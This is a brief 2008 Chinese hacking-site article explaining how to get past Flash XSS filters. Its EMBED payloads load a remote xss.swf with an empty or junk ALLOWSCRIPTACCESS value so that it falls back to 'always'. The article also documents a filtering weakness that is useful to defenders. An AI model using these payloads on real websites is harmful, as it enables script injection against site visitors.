您现在的位置: | Flash XSS |
| Flash XSS | ||
| 作者:YesHack.… 文章来源:YesHack.Com 更新时间:2008-2-28 0:13:20 【字体:小 大】 | ||
在进行FLASH XSS攻击的时候,简单的处理多是使用AllowScriptAccess属性,将其设置为sameDomain(同域下swf执行AS),更彻底的就 never.但是检查的时候很多是判断参数是不是always,如果是,就把always换成sameDomain或者never,但是如果是空呢? <EMBED SRC="http://很好,很疯狗.com/xss.swf" ALLOWSCRIPTACCESS=""></EMBED> 那么以上的处理就失效了,恰巧,当ALLOWSCRIPTACCESS参数为空时,将会使用默认值"always",日. 如果不允许设置""呢,那就随便拿个被替换为空的字符串. <EMBED SRC="http://很好,很疯狗.com/xss.swf" ALLOWSCRIPTACCESS="fuckjnc"></EMBED> 或者这样 <EMBED SRC="http://很好,很疯狗.com/xss.swf" ALLOWSCRIPTACCESS="alwaysalways"></EMBED> 以上两种方法视情况而定!
|
||
|
||
| 文章录入:YesHack 责任编辑:YesHack.Com | ||
